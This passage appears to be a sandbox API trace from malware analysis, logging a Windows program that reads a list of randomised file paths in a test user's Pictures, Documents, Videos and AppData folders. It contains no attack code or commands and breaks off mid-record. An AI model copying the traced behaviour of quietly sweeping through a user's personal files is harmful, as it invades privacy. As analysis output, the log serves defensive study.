ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.816] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/HDFQW%20QK5sILpA%20IO/yfxU1RPal7.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/yfxu1rpal7.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/yfxu1rpal7.bmp" [0085.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/yfxu1rpal7.bmp") returned 140 [0085.817] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.817] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.817] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.817] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/THSn5KdbG.jpg" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/thsn5kdbg.jpg") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/thsn5kdbg.jpg" [0085.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/thsn5kdbg.jpg") returned 58 [0085.817] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.817] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.817] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.817] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/7oGjb-qE0L0.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf" [0085.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf") returned 61 [0085.817] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.817] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.817] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.817] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/cS9dBB0db.pps" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps" [0085.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps") returned 65 [0085.818] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.818] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.818] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.818] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/oz2_MrsbRIZC.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx" [0085.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx") returned 61 [0085.818] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.818] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.818] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.818] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/Y7YKWWpLwltoJ6hK%20z.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx" [0085.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx") returned 71 [0085.818] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.818] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.818] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.818] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/7qgDkajlv%20OV0mtF.pptx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx" [0085.818] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx") returned 69 [0085.819] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.819] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.819] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x180, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x180, lpOverlapped=0x0) returned 1 [0085.819] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/TpxyvhqitSjWoNKMm/yWZ6bCkDGKeaDV/MSEz/9U1awhjmoFI.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif" [0085.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif") returned 124 [0085.819] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.819] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.819] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.819] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/aUHiFtR.pdf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf" [0085.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf") returned 57 [0085.819] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.819] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.819] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.819] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/DuZlmllYI_US.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv" [0085.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv") returned 68 [0085.820] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.820] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.820] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.820] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/kHV7BWlacmMoMab9Eeg.odt" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt" [0085.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt") returned 88 [0085.820] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.820] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.820] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.820] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/XCrdCV/6itn%20RAYPy3K4Dh-lrq.bmp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp" [0085.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp") returned 103 [0085.820] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.820] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.820] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.820] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/E1-SZDw/QCJka57cOSu3vMHW1M.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv" [0085.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv") returned 73 [0085.821] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.821] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.821] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.821] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/dxIxxJ.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif" [0085.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif") returned 64 [0085.821] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.821] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.821] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.821] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Videos/4-PA3_vg9kycz2Coo.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf" [0085.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf") returned 64 [0085.821] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.821] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.821] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.821] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/HKofn.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf" [0085.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf") returned 93 [0085.821] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.821] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.821] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.821] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/J-fqX8Oz1.flv" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv" [0085.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv") returned 65 [0085.822] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.822] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.822] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.822] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/8ep2ZUetsNPLh6GpU01.ots" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots" [0085.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots") returned 107 [0085.822] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.822] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.822] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.822] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/AppData/Roaming/QU7QixvGBkO.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf" [0085.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf") returned 67 [0085.822] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.822] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.822] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.822] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/9WZlbbOC.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx" [0085.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9wzlbboc.xlsx") returned 59 [0085.822] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.822] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.822] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.822] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/vw6XLs.xlsx" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx" [0085.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/vw6xls.xlsx") returned 57 [0085.823] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.823] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.823] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.823] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/KQayysRUiMUhUr.gif" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/kqayysruimuhur.gif" [0085.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286807, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: 